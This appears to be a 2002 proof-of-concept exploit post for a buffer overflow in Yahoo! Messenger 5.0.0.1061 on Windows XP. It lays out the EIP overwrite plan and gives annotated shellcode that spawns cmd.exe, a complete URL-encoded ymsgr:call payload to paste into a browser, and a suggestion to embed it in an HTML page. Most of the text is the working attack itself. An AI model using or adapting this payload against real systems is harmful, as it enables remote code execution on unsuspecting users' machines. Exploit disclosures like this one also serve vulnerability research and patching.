Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro Intro: Proof of concept code for YM Buffer Overflow as discovered in: http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt Code flow: Overwrite EIP at 218 Point EIP to a "RET" in the memory "RET" jumps to beginning of shellcode Shellcode spawns cmd.exe Terminate YM gracefully :) 'shellcode': 55 push ebp 54 push esp 5D pop ebp 33 FF xor edi,edi 57 push edi C6 45 FC 63 mov byte ptr [ebp-04h],'c' C6 45 FD 6D mov byte ptr [ebp-03h],'m' C6 45 FE 64 mov byte ptr [ebp-02h],'d' 57 push edi C6 45 F8 03 mov byte ptr[ebp-08h],3 ;Max window 8D 45 FC lea eax,[ebp-4h] 50 push eax B8 7E684C67 mov eax,7E684C67h ;CreateProcess@77E684C6h C1 C8 04 ror eax, 4 FF D0 call eax B8 7EB854B7 mov eax,7EB854B7h ;FatalExit@77EB854Bh C1 C8 04 ror eax, 4 FF D0 call eax Test: Parse this to your IE browser ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77 Or put this into an HTML file Click here Fix: Update YM at http://messenger.yahoo.com/ Credit: sk@scan-associates.net 31 May 2002